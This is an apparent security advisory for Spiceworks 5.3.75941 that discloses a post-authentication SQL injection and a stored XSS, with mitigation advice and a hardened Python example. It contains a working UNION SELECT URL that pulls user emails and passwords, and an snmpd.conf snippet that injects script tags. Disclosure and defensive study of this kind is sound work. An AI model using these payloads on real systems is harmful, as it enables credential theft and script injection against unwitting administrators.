Vendor: Spiceworks
By: CERT
CVSS: 8.8 (HIGH)
Vulnerability: SQL Injection and Stored XSS
CWE: 89 (SQL Injection) and 79 (XSS)
Product Name: Spiceworks
Affected Version From: 5.3.75941
Affected Version To: 5.3.75941
Patch Exists: NO
Related CWE: N/A
CPE: a:spiceworks:spiceworks
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

SQL Injection (Post-Authentication) and Stored XSS in SpiceWorks

An authenticated attacker can exploit a SQL injection vulnerability in SpiceWorks to read sensitive information. The api_v2.json endpoint places the queries[device][conditions] parameter into the database query without sanitization, so an attacker can append a UNION SELECT that pulls, for example, the email and password columns of the users table (see the proof of concept below). Separately, a stored XSS vulnerability can be triggered by configuring the snmpd.conf file of an SNMP-monitored host to contain malicious JavaScript.

Mitigation:

Ensure that all user-supplied input is validated (and bound as query parameters rather than concatenated into query text) before it is used in a SQL query. Likewise, treat values collected from monitored hosts over SNMP as untrusted and output-encode them before they are rendered by the web application.
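The following is an added illustration of that mitigation for the api_v2.json query, not Spiceworks' own code (its real handler is not shown on the page): the select list and the conditions field are checked against an assumed column whitelist and the filter value is bound as a parameter, so the advisory's injected conditions value is refused before any SQL runs.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

# Constructed in-memory stand-in for the device table behind the API query;
# the column names come from the PoC's select list, the row is made up.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE devices(id INTEGER, manufacturer TEXT, model TEXT,
                             operating_system TEXT, device_type TEXT);
        INSERT INTO devices VALUES (14, 'Acme', 'R1', 'Linux', 'router');
    """)
    return db

# Columns a caller may select or filter on (assumed whitelist).
ALLOWED = {"id", "manufacturer", "model", "operating_system", "device_type"}
# Only <column>=<literal> is accepted; no parentheses, quotes or '--', so the
# PoC's ") UNION SELECT ... --" value can never match.
CONDITION_RE = re.compile(r"^(\w+)=([\w .:-]+)$")

def run_device_query(db, url):
    """Hardened handler: whitelist columns, bind the literal, never splice text."""
    qs = parse_qs(urlparse(url).query)  # percent-decodes the values as well
    select = qs["queries[device][select]"][0]
    conditions = qs["queries[device][conditions]"][0]
    cols = [c.strip() for c in select.split(",")]
    if not all(c in ALLOWED for c in cols):
        raise ValueError("unknown column in select")
    m = CONDITION_RE.match(conditions)
    if not m or m.group(1) not in ALLOWED:
        raise ValueError("conditions must be <allowed column>=<value>")
    sql = f"SELECT {', '.join(cols)} FROM devices WHERE {m.group(1)} = ?"
    return db.execute(sql, (m.group(2),)).fetchall()

def query_is_rejected(db, url):
    """True when the handler refuses the request instead of running it."""
    try:
        run_device_query(db, url)
    except ValueError:
        return True
    return False

# Constructed legitimate request, and the advisory's injected conditions
# value attached to the same (shortened) select list.
BASE = ("http://server/api_v2.json?queries[device][class]=Device"
        "&queries[device][select]=id,manufacturer,model&queries[device][conditions]=")
GOOD_URL = BASE + "id=14"
POC_URL = BASE + ("id=14%29%20UNION%20SELECT%20NULL,%20NULL,%20NULL,%20email,"
                  "%20NULL,%20NULL,%20password%20from%20users%20where%20id=1--")
```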

Exploit-DB raw data:

Product: SpiceWorks
Version: 5.3.75941
Vendor Site: http://www.spiceworks.com/community/
Software Download Link: http://www.spiceworks.com/download/?utm_source=comm-secondary-link&utm_medium=website&utm_campaign=homepage
Installer Filename: Spiceworks.exe (MD5: 023bd361c0f9402dc07adbc5a72fe31d)
Contact: http://www.spiceworks.com/contact/

Timeline:

04 Jun 2012: Vulnerability reported to CERT
08 Jun 2012: Response received from CERT with disclosure date of 20 Jul 2012
23 Jul 2012: Update received from CERT: No response from vendor
23 Jul 2012: Public Disclosure

SQL Injection (Post-Authentication):

http://server/api_v2.json?queries[device][class]=Device&queries[device][select]=id,b_manufacturer,manufacturer,b_model,model,operating_system,device_type&queries[device][conditions]=id=14%29%20UNION%20SELECT%20NULL,%20NULL,%20NULL,%20email,%20NULL,%20NULL,%20password%20from%20users%20where%20id=1--

Stored XSS:

An attacker who controls a host that SpiceWorks inventories over SNMP can place JavaScript in the system fields of its snmpd.conf; the values are stored and later rendered without encoding, as shown in the proof of concept below:

rocommunity public
com2sec local	localhost	public
view	systemview	included	.1.3.6.1.2.1.1
view    systemview      included	.1.3.6.1.2.1.25.1.1
view    systemview      included	.1 80
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName dook<script>alert('name')</script>